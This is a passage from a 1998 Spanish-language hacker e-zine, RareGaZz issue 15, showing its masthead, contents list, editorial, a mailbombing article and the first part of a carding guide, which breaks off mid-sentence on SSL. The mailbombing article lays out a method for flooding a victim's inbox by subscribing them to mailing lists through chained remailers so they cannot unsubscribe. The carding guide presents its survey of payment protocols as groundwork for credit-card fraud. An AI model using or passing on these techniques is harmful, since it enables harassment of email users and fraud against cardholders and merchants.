
	   ----------------------------------------------------
 Ao 2/Numero 15                                       Noviembre de 1998

				           
	   ----------------------------------------------------

   ooooooo       oo  ooooooo  oooooo     ooooo        oo   oooooo  oooooo
   $$""$$"    o$"$$  $$""$$"  $$       o$$""o,     o$"$$   """$$   """$$
   $$o$$"    $$  $$  $$o$$"   $$$$$$   $$    $$   $$  $$     $$      $$
   $$$$$    $$   $$  $$$$$    $$""""   "$o   $$  $$   $$    $$"     $$"
   $$" $$   $$$$$$$  $$" $$   $$        "$o  $$  $$$$$$$   o$"     o$"
   $$  "$$  $$   $$  $$  "$$  $$ooooo     "$o$$  $$   $$  o$$oooo o$$oooo
   ""   """ ""   ""  ""   """ """""""        ""  ""   ""  """"""" """""""

	   ----------------------------------------------------
				    

                        "La verdad nos hara libres"
	   ----------------------------------------------------

        
                            Editor: GuyBrush
                       Co-editores: Azumlord, Cytorax, Senpai, PaTa,
                                    Yo_Soy y 12r
                    RareGaZz Team : 12r, Arkangel, AzumLord, Cytorax  
                                    Grovvy,  Guybrush, KillerBot 
                                    Mr.X, Orion, PaTa, RareTrip,
                                    Senpai, ServerHacker, Vov_77
                                    y Yo_soy.
                   Agradecimientos: Dr_Format^, Unamed Person, SatMex,
                                    \Wend|g0, ToMaCHeLi, ZeD, CHack,
                                    Mr. Aztech," >< TONE " y John
          Distribuidores Oficiales: raregazz.acapulco.uagro.mx
                                    raregazz.islatortuga.com
		     E-mail Ofical: raregazz@iname.com
	       Saludos (Oficiales): #RaZa MeXicaNa Team, X-ploit Team,
                                    SET y JJF Hackers.
	   Frase del Dia (Oficial): "ip!, ip!, echame las otras" Azumlord
				    despues de una mala noche.
      Rayadas de Madre (Oficiales): jmasojan, el lamer de mierda que borro
				    los archivos del ftp de la lista de los
				    RareDudeZz y el(los) idiota(s) lamer(s)
				    que avisaron a los de geocities sobre la
				    pagina de SET.
	   Comentarios (Oficiales): Mas vale tarde que nunca :-)


         [ C o n t e n i d o s ]Ŀ
       Ĵ                                                         
          +Editorial ------------------------> GuyBrush          
          +Tecnicas de Mailbombing ----------> Senpai/GuyBrush   
          +Fraude electronico (Carding) -----> PaTa              
          +Telefonos celulares (Phreacking) -> Azumlord          
          +Guia para Hackear Hotmail --------> \Wend|g0          
          +Crackear PWL's con el PLWOSR -----> CHack             
          +Agentes Inteligentes -------------> 12r               
          +Varios trucos interesantes -------> SatMex            
          +Maneras de colarse en el HD (IRC)-> ToMaCHeLi/ZeD     
          +IRC (guia rapida) ----------------> Yo_Soy            
          +Cisco Routers --------------------> GuyBrush          
          +Hack basico ----------------------> Mr. Aztech/       
                                               " >< TONE "/John  
          +Guia de instalacion de CPI's -----> Unamed Person     
          +Virus Batch (2a Parte) -----------> Yo_Soy            
          +Corba ----------------------------> 12r               
          +Blue Boxing en Argentina ---------> Dr_Format^        
          +Entrevista a X-Ploit Team --------> GuyBrush          
          +Bugs & Exploits ------------------> PaTa              
          +Historias del IRC (segunda parte)-> GuyBrush          
          +Noticias -------------------------> GuyBrush          
          +Cartas del Lector ----------------> GuyBrush          
          +Llaves PGP -----------------------> RareGaZz Staff    
          +Despedida ------------------------> GuyBrush          
        
       

   "Plante un olivito, que espero que crezca sano y saludable a mi lado"
                               << PaTa >>

  01010101010101010101010101010101010101010101010101010101010101010101010
  10                                                                   01
  01 #!/bin/RareGaZzsh                                                 10
  10 # La informacion contenida en este zine tiene fines completamente 01
  01 # de entretenimiento y educativos, los autores de  la informacion 10
  10 # aqui presentada no se hacen responsables de los  posibles daos 01
  01 # que se puedan ocasionar......                                   10
  10                                                                   01 
  01010101010101010101010101010101010101010101010101010101010101010101010



[ E d i t o r i a l ]

  Este ezine es muy especial para mi ya que es el ultimo que edito. Para bien
  o  para mal,  debo dejar  RareGaZz temporalmente.  Resulta que me cambio de
  domicilio y de momento andare unos meses sin telefono, pero no se preocupen
  que seguire sus actividades aunque sea desde un cyberc@fe.

  Azumlord se queda encargado de la direccion de RareGaZz y yo dejare de leer
  mi correo  ya que  estare algo  desconectado de este mundillo durante algun
  tiempo. Pero  quiero que  sepan todos  que, de  una manera u otra, GuyBrush
  estara siempre con ustedes.


                                                -= GuyBrush =-

                                        http://raregazz.acapulco.uagro.mx
                                        http://raregazz.islatortuga.com
                                        raregazz@iname.com


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


[ Tecnicas de MailBombing - Senpai/GuyBrush ]

  Como todos sabeis, el mailbombing es el 'arte' de joderle a alguien el buzon
  de correo. Al igual  que en todo, existen  algunas tecnicas menos lamers que
  otras. Ademas, cualquier persona con dos dedos  de frente y  algunos minimos
  conocimientos debe ser capaz de rechazar este ataque.

  La peor forma de realizar un bombardeo es coger el tipico programa  de mail-
  bombing y enviar 500 mails o ficheros de 20 Mb sin ni  siquiera comprobar si
  el server muestra tu IP ... y luego vienen los problemas.

  Bien, pues  en el  caso de que  alguno sufra un  ataque asi, no  hay mas que
  acceder por telnet al buzon de correo (puerto 110) y borrar todos los mails.
  Como mucho perdemos algun mensaje que nos interese, pero ya esta. Ademas, si
  el  que nos bombardeo  puso el mismo subject  en todos los  mails, mas facil
  todavia para borrarlos.

  Otra tecnica  mejor, seria suscribir a  nuestra victima  a muchas  listas de
  correo. Y si estan en distintos idiomas mejor.

  Pero esto tambien  puede solucionarse  rapidamente. Basta  con leer bien los
  mails y enviar el 'unsuscribe' correspondiente. Ademas, la mayoria de listas
  de correo  piden  una confirmacion  antes de  suscribir a  nadie. Pero  esto
  tambien lo puede preveer el atacante y falsificarlo, al igual que el mail de
  suscripcion.

  Pensando en  algo mas sofisticado,  podriamos crear  una cuenta en hotmail y
  usar un remailer que nos redireccione alli el correo (por ejemplo, en  iname
  o en bigfoot). Una  vez suscritos a las listas y enviadas las confirmaciones
  correspondientes,  ya podemos  modificar  el  'forward'  del  remailer  para
  enviarlo a un nuevo destinatario ... imaginais quien? si, la pobre victima.

  Claro esta  que si  el usuario atacado es un poco 'cuco' puede ver el origen
  de esos mails (vienen del ramailer) y falsificar el 'unsuscribe'.

  Pero, que ocurriria si en vez de un  remailer usamos dos?  podemos suscribir
  el primero y redireccionar los mails al segundo; y de alli a la victima.  De
  esta forma  seria imposible que se dessuscribiera ya que nunca sabra cual es
  la direccion que realmente esta suscrita.

  Bueno, pues eso es todo. Si se os ocurre alguna tecnia mejor ... enviarla.


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


[ Fraude electronico (Carding) - PaTa ]

ͻ
ͻ
ͻ
         FRAUDE ELECTRONICO   > CARDING <   LA GUIA DEFINITIVA          
                               por PaTa                                 
ͼ
ͼ
ͼ

        CONTENIDOS

        1 PARTE

        1 ................ Descripcion
        2 ................ Introduccion
        2.1 .............. Tipos de pago
        2.2 .............. Cifrado de datos
        3 ................ Tipos de protocolos
        3.1 .............. Cheques Electronicos FSTC
        3.2 .............. First Virtual
        3.3 .............. CyberCash C-5
        3.4............... DigiCash
        3.5 .............. Virtu@l Cash
        3.6 .............. SSL
        3.7 .............. Despedida

        2 PARTE

       3 ................. Introduccion
       4 ................. Obtener tarjetas de credito
       4.1 ............... Robar tarjetas 
       4.2 ............... Robar tarjetas sin violencia
       5 ................. Trashing
       6 ................. Verificar la tarjeta
       7 ................. Ingenieria social
       8 ................. Recojer el paquete
       9 ................. Estructura de la tarjeta de credito
       10 ................ Crear tarjetas 
       10.1 .............. Algoritmo para la creacion de tarjetas de credito 
       11 ................ Compra por telefono
       12 ................ Varios                
       13 ................ Conclusiones
       14 ................ Agradecimientos


>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<


        1.- DESCRIPCION
                         
        Bueno este  articulo  que vas a leer ahora es el resultado  de un duro
trabajo y el seguimiento de algunas lista  de correo sobre el tema, al inscri-
birme  me interesaba la idea pero segun iban  pasando los dias me intereso mas
y  mas, por  lo  que decidi profundizar en el tema, la primera parte que vas a
leer  te  puede resulta  un   poco  aburrida,  pero  nunca  te has preguntado,
Como se realizan  las  compras  por  Internet?  Yo si, y me dispuse  a buscar
informacion, bueno  y  aqui  esta.  Es una informacion tecnica y puede que  en
algunos casos se te haga pesada, pero esta enfocada desde el punto de vista de
la seguridad obviando otros temas necesarios en las comunicaciones que no  nos
interesan. En la segunda parte podras encontrar informacion para hacer carding
pero para  saber  correr antes hay que saber andar.

        La segunda parte la podras leer en el siguiente numero de la revista.                

                         
        2.- INTRODUCCION
                         

        El salto  del  milenio  apunta  hacia  nuevos  habitos  de consumo. El
consumidor  del  siglo XXI buscar la comodidad en sus compras.  Los  estudios
sobre  el  comercio  electronico e-commerce, vaticinan, segun  la  prestigiosa
Forrester Research (www.forrester.com) crezca de los 121 millones  de  dolares
de  1997  a  los  3800 en el 2002, solo en EE.UU. Entonces porque no intentar
sacar algo de provecho nosotros ciudadanos de a pie?

        El  contra-reeenbolso,  es  un  medio perfecto para el usuario, aunque
claro hemos  evolucionado  desde  el  rudimentario  trueque,  hasta la moderna 
plstico  ( pasando por los metales preciosos y el papel moneda),...., contra-
reenbolso,...  para  finalmente llegar al comercio electronico, en  todos  los
sitemas  ha  habido  formas de engaar y sacar partido , quien ha dicho que en
este ultimo no?

      Como es bien conocido, los medios de pago tradicionales sufren numerosos
problemas  de  seguridad:  falsificacin de billetes, falsificacin de firmas,
cheques sin fondo, etc. Por otro lado, los medios de pago electrnicos, adems
de  estar  sujetos  a  los  mismos  problemas  anteriores,  presentan  riesgos
adicionales, pues a diferencia  del papel, los documentos digitales pueden ser
copiados perfectamente y cuantas  veces  se desee, las firmas digitales pueden
ser falsificadas por cualquiera que conozca la  clave privada del firmante, la
identidad de una persona puede ser asociada de forma  inequvoca con la infor-
macin relacionada en cada pago, etc.

       Las tarjetas de credito son el instrumento mas utilizado en el comercio
electronico.  Supone  un cobro rapido para el vendedor a cambio de una pequea
comision. Ademas de que todo el mundo  tiene  una,  se  estan  convirtiendo en
parte importante de nuestra vida, no salimos sin ellas.

        Me voy a centrar en que  el  pago  se  ordena  a  traves  de Internet,
mientras  que la validacion y realizacion efectiva, se realiza a traves de los
circuitos  normales   que  las   entidades  poseen  a  tal  efecto,  de  forma
independiente de si la transacion ha sido ordenada desde Intenet o no.

        Aqui pongo los sistemas que mas se utilizan en Internet. Me dejo cosas
como  el  SET  pero  eso  sera para otro articulo ya que me parece un tema muy
interesante


        2.1 TIPOS DE PAGO

        Los dos sistemas clasicos por excelencia de pago no efectivo  son los
cheques  convencionales  y las tarjetas de credito.  En el sistema financiero,
el dinero toma forma de entrada  en  los  libros  de  los  bancos  y  de otras 
instituciones  financieras.   Esto para el usuario se refleja en la existencia
de una cuenta deposito en la que  se  graban  los  depositos  del cliente y se
realizan pagos en forma de cheques o transferencias.

        Un  cheque  es  un  documento   escrito  por  el  usuario de la cuenta
y  autentificado  por el mismo que se entrega a un comerciante, quien a su vez
lo acepta antes de  presentarlo  en su  banco.   Si el banco cobrador y el del 
vendedor son los mismos, todo se reduce a una compensacion interna de apuntes.  
Si  por le contrario, ambos disponen de cuentas en bancos  distintos, el banco 
cobrador debera presentar  el  cheque  y  recojer  los  fondos  a traves de un
sistema  de  ajuste  o  camara de compensacion ACH (Automatic Clearing House).
Esta  camara  puede  pertenecer al estado,  por ejemplo, al banco emisor de la
moneda, o tratarse de  un  sistema  intermediario  privado,  como  VisaNet ACH
Service.  En el momento  de la entrega del cheque, el cobrador no sabe si este
se  encuentra respaldado por fondos por lo que corre  cierto riesgo.  Pero los
pagadores  tambien  asumen determinados riesgos frente a la posible existencia
de cheques falsos ya que reciben los extractos de las cuentas despues de pagar
sin confirmacion previa al pago.

        Otra alternativa es la  utilizacion de un sistema de credito, como una 
tarjeta  o  un servicio bancario de adelantos de descubiertos.  EL comerciante 
se asegura el pago  y el emisor asume la responsabilidad del cobro.  El ajuste
se realiza entonces cuando el comerciante envia un lote de autorizaciones a su 
banco  entre este y el banco emisor de la tarjeta

        Existen dos tipos de  operaciones  con  tarjeta de credito que suponen 
distinto balance de riesgo en funcion de si la tarjeta se encuentra presente o 
no.
                En  el  primer  caso,  la tarjeta presente, todo el riesgo del 
credito pasa al comerciante.  En estos casos el comerciante puede verificar la 
firma del titular comparando la que este  imprime  en  el  recibo  con  la que 
aparece  en  la  tarjeta.  Por ello, sera  responsabilidad suya si se hace uso 
fraudulento  de la tarjeta de un tercero. La integridad de la transacion queda 
garantizada para  el cliente mediante un papel-copia del recibo.  El nombre de
la cuenta se autentifica  a  traves  del  numero de la tarjeta y la transacion
puede  ser  confirmada  enviando  los datos por medio de una red privada de la
asociacion.

               En el segundo caso, la tarjeta no presente, el consumidor asume 
cierta   parte (pequea)  del  riesgo  ante   un  posible  fraude  ya  que  es 
responsabilidad  suya  proteger  el numero de tarjeta, debido a que este es el 
unico medio de identificacion del  pagador  en  la  transacion ( como mucho se
podra  pedir  la  fecha  de caducidad y direccion y comprobarlas).  Este es el
sistema  empleado  en los pedidos  por  telefono  o  internet (en pedidos como
correo o fax, aun se  cuenta  con  la  firma  del  titular  como  medio  de no
repudiacion,  que  no de autentificacion). Por  ello, dado que nada impide que
se pueda colocar un sniffer (programa que monotoriza todos los datos que pasan
por  cierto  ordenador)  en  la  red,  los numeros  de  tarjeta  deben  viajar 
encriptados por la red.

        Hay  diferencia  entre  el  uso  de  cheques  y  de tarjetas.  Un pago
mediante  cheques  supone  dinero pagado para el consumidor, que asumira todos
los inconvenientes derivados de una falla del comerciante.  SIn embargo, si se
paga  con tarjeta se puede pedir la restitucion del importe.  EL problema pasa
a ser del banco   emisor  de  la  tarjeta,  que  debera  pedir  cuentas al del
comerciante.
                
      Considerando que el cyber-espacio no pueden ser iguales las transaciones 
que de la forma clasica se deben tener en cuenta:

        - Seguridad:  La criptografa moderna proporciona complejos mecanismos
matemticos que   evitan  el  fraude.  Por otro  lado, la seguridad es un tema
complejo que involucra   muchos   otros   factores:   protocolos,  estndares,
autoridades  de certificacin, etc.
        - Verificacion  de  la  autorizacion  de las transaciones, para evitar
fraudes. En el modelo clasico esta verificacion  se  hace  mediante  firmas en 
tarjetas  de  credito  o  en  cheques,  en el mundo electronico se suelen usar
aunque no siempre las firmas digitales.
        - Confidencialidad : Ciertos    datos   intercambiados   durante   una
transaccin de pago necesitan ser ocultados  a la vista de todo el mundo salvo
para el agente al que van destinados dichos datos.
La  confidencialidad  es normalmente garantizada mediante el cifrado de datos.
Sin embargo, sta cuestin  est  resultando  ser un problema en la mayora de
los  pases  debido a las restricciones impuestas por los diferentes gobiernos
para utilizar algoritmos  criptogrficos de cifrado de datos con un alto nivel
de seguridad. En algunos pases ( Francia)  el cifrado de datos est absoluta-
mente prohibido sin el permiso de la oficina  gubernamental  correspondiente y
normalmente  sin el depsito previo de las claves de cifrado en dicha oficina.
En otros pases (EE.UU.) se  restringe  la  utilizacin de estos algoritmos al
territorio nacional, debiendo utilizar una versin mermada del algoritmo si se
quiere utilizar ms all de sus fronteras.
       - Garantia de la integridad de las ordenes, con el fin de evitar abusos
por  parte de los comerciantes.  En el sistema  habitual  se  emplean  papeles 
especiales, en  el  mundo  electronico  se  emplearan  certificados digitales, 
descripciones   encriptadas  del   intermnediario,  y  se  utilizaran  recibos 
digitales.
        - Confidencialidad: No solo  proteger los numeros y campos claves sino  
la  privacidad del usuario, ocultando incluso a los ojos de los intermediarios.
        - Integridad: Otro aspecto importante en todo sistema de pago electr-
nico  es  la  integridad  de  los  datos  intercambiados entre los agentes del
sistema,  mxime  cuando  esos  datos  se refieren a importes de un pago, a un
nmero  de  cuenta  bancaria, etc. La  integridad  de  las  comunicaciones  es
garantizada mediante  cdigos  de  autenticacin de mensajes (MACs), funciones
resumen y firmas digitales. En el caso de la relacin cliente - comercio, esto
slo  es  posible  cuando  el  cliente  est en posesin de un dispositivo con
capacidad de clculo y de almacenamiento  seguro de claves, como es el caso de
una tarjeta inteligente.
     As por ejemplo, las claves criptogrficas de clientes y comercios suelen
almacenarse  en  tarjetas inteligentes y mdulos de seguridad (SAMs) respecti-
vamente. Los datos en los servidores  de  las entidades financieras que inter-
vienen en el sistema de pago de son almacenados  en  bnkers  de seguridad que
normalmente  se  encuentran  duplicados  para  evitar las posibles prdidas de
informacin como consecuencia de posibles fallos.
        - Ajuste de cuentas: Se recurria a las redes financieras clasicas.
        - Autentificacion:  En  todo sistema de pago los participantes del
sistema deben demostrar que son los que dicen ser.  Para evitar los fraudes.
        En  el caso de tarjetas inteligentes (con microprocesador, dotadas por
tanto de una  capacidad  de  clculo) esto se realiza mediante algn protocolo
criptogrfico de autenticacin, mientras  que en el caso de tarjetas con banda
magntica, se  realiza  mediante  una  verificacin  visual  de  ciertos datos
grabados en la superficie de la tarjeta (hologramas, firmas, etc.).
        En los  sistemas  basados  en  tarjetas, se suele verificar tambin la
asociacin  correcta  de  la  tarjeta  con  su  poseedor (Titular de la cuenta
asociada  a  la  tarjeta). Esto  se realiza normalmente a travs de nmeros de
identificacin  personal (PIN). Lo  mismo  ocurre  en  los  sistemas de pago a
travs de  redes  donde se necesita una autenticacin de la persona fsica que
utiliza en un instante determinado el sistema.
        - Confirmacion de  la  transacion.  Para  evitar  que  nadie  suplante
nuestra personalidad.
        - Anonimato: Si una persona realiza un viaje en un medio de locomocion
no  privado,  y  paga  en  efectivo  no hay forma de monotorizarle, pero si en
cambio  paga con una tarjeta de credito, (quien quiera ver un ejemplo practico
que se lea "El Informe Pelicano").  Pero si  lo  paga  con  trajeta de credito
puede  ser  posible recontruir su recorrido, e incluso los sitios por donde ha
pasado y pagado  con  su tarjeta.  Esto mismo ocurre con todo tipo de compras.
No  obstante, el anonimato  constituye  sin  duda  uno  de  los  aspectos  ms
polmicos  de  estos  sistemas,  ya que mientras para unos sera base irrenun-
ciable de la libertad econmica y el derecho a la intimidad, para otros podra
constituir una puerta abierta a la delincuencia y el blanqueo de dinero.
        - Independencia: El uso de dinero digital no debera estar restringido
a una red, organizacin o pas concreto, sino que debera ser independiente de
esas limitaciones y fcilmente utilizable desde cualquier punto del planeta.
     Aqui una pequea descripcion de los medios de pago, no voy a entretenerme
mucho con ellos ya que se podria hablar bastante:


        2.2 CIFRADO DE DATOS

        Tenemos  que  tener  en cuenta  que  nuestro dinero viaja por la red y
cualquiera puede tener acceso a ello, por lo  que  sera  basico  que  nuestras
transacciones  vayan  encriptadas.  Internet  en un medio basicamente inseguro
por lo que las medidas de seguridad deben ser altas.
        La mayor  parte  de  protocolos  que  utilizan los siguientes sistemas
utilizan  algoritmos  criptogrficos  de clave pblica (RSA), de clave secreta
(DES), o ambos a la vez, para cifrar todos los datos importantes, de forma que
slo puedan ser accesibles a las partes involucradas  en  las  operaciones,  y
todos ellos tienen buen cuidado en que su empleo sea absolutamenarente para el
usuario.
        Aunque  puedas  pensar  que el cifrado sea absolutamente necesario, no
utilizaba ninguna clase de cifrado, se basaba en el uso del correo electronico
El sistema de pagos de First Virtual ha  sido  retirado  recientemente de este
mercado, pese a habersido uno de sus pioneros.

        
      3 TIPOS DE PROTOCOLOS

      3.1 CHEQUES ELECTRONICOS FSTC (Financial Services Technology Consortium)

        El  pagador  debe  contar  contar  con  un  procesador  seguro, que se
implementa en forma de tarjeta inteligente.
        Este procesador es el encargado de generar los cheques  que consisten, 
simplemente en ordenes de pago firmadas digitalmente. Los cheques se trasmiten
al comerciante que tambien los acepta firmandolos, tambien digitalmente  y los
envia al banco, que los hara efectivos a traves de la una red ACH clasica.

 Ŀ
                  Esquema de funcionamiento de cheques FSTC                
                               
                                                                           
                                                                           
                                                                           
  Pagador -> Cueque                                                      
               Firma Pagador                                               
               Certificado Kpp -->  Cobrador  -->  Cheque               
                                                      Firma pagador        
                                                      Certificad Kpp       
                                                      Firma Cobrador       
                                                      Certificado Kpc      
                                                                          
                                                                          
          Banco Cobrador <- ACH --> Banco pagador  <-               
                                                                           
 


        3.2  FIRST VIRTUAL (FV) 

        Fue uno de los primeros en aparecer con al pecularidad de no hacer uso
de la criptografia.  Un  consumidor  que  desee  hacer uso del sistema primero
debe  registrarse  en  el  mismo, tras  lo  que  obtiene  un Virtual PIN, ID o
identificador de First Virtual.  Para ello debe de enviar un numero de tarjeta
de  credito, VISA o MasterCard, por  medio off-line, como telefono o fax.  Una
vez  registrado, quiera  hacer  una  compra  a  un  comerciante  o  acceder  a
informacion restringida en un servidor que emplee el sistema

 Ŀ
                     Esquema del sistema First Virtual                     
                               
                                                                           
  PAGADOR            Virtual Pin (1) --> PAGADO  <-Ŀ     
    / \   <- (4) informacion               / \                    
                                                                        
                                                                        
     |                                                                   
   Quieres                                          |                |     
    pagar?                                    Solicitud (2)     Respuesta     
    (5)  -->-<--  FIRST -->---<--Autorizacion      (3)      
  Respuesta             VIRTUAL ->---<-       
                            |                                              
                                                                          
                             (7)                                          
                           \ /                                             
    BANCO PAGADOR <-- ACH -->BANCO COBRADOR                    
                                                                           
 


        Para obtenerlo recibiremos un mail con una clave de doce digitos, y un
numero de telefono donde confirmarlo.  Mantener un PIN cuesta 5 dolares al ao
aproximadamente.  Como vemos los datos se envian por un medio off-line.

        Le  bastara  presentar  su  Virtual  PIN  al  mismo. El comerciante se
conectara a un servidor FV para comprobar si es correcto, y de ser asi, enviara
la mercancia o dara paso libre a la informacion.
Para  realizar  un  pago  al  comerciante,  First  Virtual, envia un e-mail la 
consumidor  en el que le indica la operacion y le pregunta si desea paga o no.  
El  consumidor  puede  responder "yes", "no", "fraud". Mediante  este  sistema
el comerciante no llega nunca a saber el numero de tarjeta del consumidor,  ni
llega nunca a viajar por la red.

        El protocolo de validacion de FV es el mas lento de todos los medio de
pagos electronicos, no hace uso de la criptografia lo  que  da  al usuario una
falsa sensacion de seguridad , si se dota de anonimicidad al usuario frente al 
comerciante.


        3.3 CYBERCASH: C-5

        Es uno  de  los  medios de pago electronicos pioneros.  La empresa fue
creada en 1994 y el sistema  CyberCash  se  encuentra operativo desde abril de
1995.   Se trata de un sistema integrado con el WWW que  utiliza  un protocolo
propio manejado  por un software que debe ser distribuido tanto a comerciantes
como a consumidores. Constituye  una  pasarela  entre Internert y las redes de 
autorizacion  de emisores de tarjetas, contando  para ello  con la experiencia 
ganada  con el sistema Verifone, de autorizacion de tarjetas por telefono, del 
cual deriva.   El  consumidor  cuenta con un software "wallet", o monedero que 
puede  ligar  a  varias  cuentas  bancarias  o  a  las tarjetas de credito. El
sotfware  encripta todos los datos, realiza  un  registro de todas las transa-
ciones y se encuentra  protegido  mediante  contrasea.  En el lado del comer-
ciante se situa un software similar.
      Cuando un usuario baja el softwre  de CyberCash, genera un par de claves 
publica, Kp, y privada, Ks para el.  El  sistema empleado es RSA de 1024 bits.  
A continuacion envia Kp al servidor de CyberCash  que  almacena en una base de 
datos. De  esta forma solo CyberCash sabe las claves  publicas  de  todos  los 
interlocutores  posibles.  La  comunicacion  entre consumidor y comerciante se 
lleva a cabo  en claro, mientras que la comunicacion de estos con CyberCash se 
realiza de forma protegida.  Para ello  se  emplea  una  clave   de sesion DES 
aleatoria de  56  bits  que  se ditribuye  encriptada con la llave publica del 
interlocutor.  CyberCash  tiene  incrustada  su  propia   llave  publica en el 
software por lo que cualquiera puede comunicarse con el. Un dato importante es
que  al  clave  DES es de 56 bits cuando  por  las  leyes  de  la  legislacion 
americana antes fijaban  un  maximo de 40 bits, y es que CyberCash consigio un 
permiso especial.

        La transacion se lleva a cabo de la siguiente manera:

                1.- El cliente  seleccicona un item a adquirir  mediante www y
elabora un pedido.
                2.-El software del comerciante envia "la facturas proforma" al 
software " wallet".  La   factura   proforma   es   texto  en  claro,  firmado
digitalmente  en  el  que  figura  una  descripcion  de la compra asi como las
tarjetas  de  credito  aceptadas.  Para  la realizacion de firmas digitales se
emplean funcines hash MD5 y claves secretas RSA.  A  su  recepcion, el sofware
"wallet" da  a elegir al usuario entre aquellas tarjetas que tiene registradas
y le pide autorizacion para realizar el pago.
                3.- Previa  confirmacion del usuario, el software "wallet" del 
cliente  genera  un  mensaje  de pago y lo envia la comerciante.  Este mensaje 
consiste en un hashing de la factura  junto  con  las  instruccuiones de pago,
todo  ello firmado digitalmente y encriptado para CyberCash.
                4.- A la  recepcion  del memsaje, el comerciante, que no puede 
descrifarlo simplemente  aade  la  informacion  al  pedido  (tambien  firmada
digitalmente) y lo remite a CyberCash.
                5- CyberCash  desencripta  y  compara  los  dos  mensajes.  Si 
coinciden  los datos, solicita confirmacion, y a traves de la red financiera y 
trasmite la  respuesta al comerciante para que este pueda cerra la transaccion
con el cliente.

       Todo este proceso se lleva a cabo en un periodo de tiempo inferior a un
minuto. El proceso descrito es el caso mas habitual, no obstante, el protocolo 
CyberCash es mucho  mas  complejo  y  contempla  la posibilidad de reintregos, 
anulaciones y solicitud de estado.  Una version antigua  se puede encontrar en 
Internet en forma RFC.

        Respecto  a  la  proteccion  del  consumidor  cabe  destacar   que, al
encriptarse  la  orden de pago para CyberCash y no para el comerciante este no
ve el numero de la tarjeta  de credito  lo  que  unido  al  hecho  de  que  se
comprueba  la  descripcion  de  la  compra, impide  el  abuso por parte de los
comerciantes.  En  lo referente a la privacidad, aunque CyberCash tiene acceso
a la descripcoin de la compra, esta no tiene porque incluir los detalles de la
compra, puede  constar  como  dato la referencia  y el tipo solamente. De este
modo el comerciante no ve al tarjeta  y  CyberCash  no  ve  el  producto.  Sin
embargo este  sistema  es  susceptible a ataques de trafico, es decir del tipo
"detecto que Fedez se conecta mucho al servidor de Playboy"     (Saluda Fedez,
que ya eres famosos en Inet) :o)

 Ŀ
                 Esquema de funcionamiento Cybercash                       
                               
                                                              Ŀ     
  Ŀ               Solicitud (1) -------------------->            
          <------------ (2) Factura proforma                PAGADO     
  PAGADOR               Datos pedidos tarjeta (3)--------->            
          <------------ (5) Respuestas                           
                                                      / \        
                                              
                                                                         
                                    Respuesta (5)                         
                                                                         
                                                 Solicitud               
                               Ŀ<-- autorizacion       
                               CYBERCASH          (4)                    
 ==============================         =================================
                                GATEWAY                                  
                                                                
                                                                          
                                   | Respuesta (5)                         
                                  \ /                                      
            BANCO PAGADOR <--ACH-->BANCO COBRADOR           
                                                                           
 


        3.4 DIGICASH

       Otro  sistema  es  Digicash, la diferencia con CyberCash, radica en que
es un sistema de pago anticipado,  donde se adquiere previamente el dinero del
banco y se almacena digitalmente en el software  del  comprador.  Este sistema
permite la compra anonima ya que no requiere autentificacion
        

        3.5 VIRTU@L CASH

      Tambien existe Virtu@l cash, de Banesto, para poder usarla hay que tener
una cuenta en Banesto.  Trabaja en un servidor seguro, certificado por la RSA.

     La tarjeta Virtu@lCash es una tarjeta de debito, de manera que el importe
de la compra se adeuda en la cuenta  asociada en  el  momento de realizarse la
operacion. La  Tarjeta podra ser utilizada, exclusivamente  a  traves  de  los
comercios adheridos a este  sistema  de  pago, limitandose los importes de las
compras al saldo disponible en la cuenta asociada a la tarjeta y a un maximo
diario preestablecido.

        Repecto a la seguridad.  El sistema se basa en el servicio de Comercio
electronico de Banesto apoyado en una  infraestructura  de  seguridad, dispone
de un servidor seguro y ha obtenido el certificado electronico RSA que permite
que las comunicaciones se realicen de forma cifrada. 
       
        Asimismo, para  poder  asociarse a este servicio se  exige a todos sus
socios,  que  lleven  a  cabo  proyectos de comercio electronico, el empleo de
servidores  seguros; ademas  de  disponer  de medidas adicionales de seguridad
tales como cortafuegos. 
       
        En el momento  del Pago, el usuario  introduce los datos de su tarjeta
y  su  Numero  de  Identificacion Personal, que solo el conoce, la transaccion
viaja encriptada por la red y el pago se lleva  a  cabo  en  modalidad On-line
contra el saldo disponible en la cuenta.


        3.6 SSL

        Cuando  encargamos  algo  desde un formulario desde nuestro navegador,
que  cualquiera  puede hacer con unos conocimientos de HTML, hacemos una invi-
tacion a que cualquiera pueda acceder a nuestros datos ya que esta informacion
viaja por la red hasta  que llega al destino, para evitar, que esa informacion
no sea presa de sniffers, ni  amigos  de los ajeno :o)  Te encuentras tu ahi?
Se utilizan servidores seguros SSL.

      El SSL es un conjunto de protocolos creados por Netscape que proporciona
sesiones  de  comunicacion  encriptadas,  autentificacion del servidor, de los
mensajes,  y  opcionalmente  de  los  clientes.  Esta compuesto por dos capas:
SSL Record Protocol, encargado de encapsular protocolos de bajo nivel y la SSH
Handshake Protocol que permite autentificarse  y  negociar  los  algoritmos de
encriptacion. SSL es independiente de los protocolos y capacita al programador
para realizar un desarrollo tranparente por encima de la capa TCP/IP.

        Los  servidores  seguros  SSL  los podremos notar porque en al esquina
inferior  izquierda  cambia a una llave cerrada en el caso de netscape.  En la
url, cambia de Http:// a Https:// (Hipertext  Transport  Protocol Secure).  EL
gobierno americano permite un cifrado de 128 bits. 

        Aunque claro "La seguridad es solo un estado mental".  Tambien  el SSL
tiene  problemas  de  seguridad,  el  26  de  junio  de  este ao Murray Hill,
informatico  de  Lucent  Technologres  hizo publica la manera de acceder a esa
informacion y obtener el numero de tarjeta y  datos criticos de la transacion.

        El  ataque  es  posible  pero  poco  probable. La vulnerabilidad no se
